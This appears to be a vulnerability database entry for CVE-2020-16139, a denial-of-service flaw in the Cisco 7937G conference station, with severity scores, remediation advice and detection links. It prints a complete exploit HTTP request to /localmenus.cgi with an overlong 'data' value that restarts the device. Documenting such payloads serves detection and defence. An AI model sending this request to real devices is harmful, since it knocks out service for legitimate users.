🔙 목록으로 돌아가기

CVE-2020-16139: Cisco Unified IP Conference Station 7937G - Denial-of-Service

TitleCisco Unified IP Conference Station 7937G - Denial-of-Service
Authorpikpikcu
SeverityHigh
ImpactAn attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users.
RemediationApply the latest firmware update provided by Cisco to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.90386
CVE IDCVE-2020-16139
Tags cve cve2020 cisco packetstorm vkev vuln

🔍 Vulnerability Description

Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.

🌐 HTTP Request

POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Connection: close
Transfer-Encoding: chunked
Accept-Encoding: gzip

0

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-16139.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-16139.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A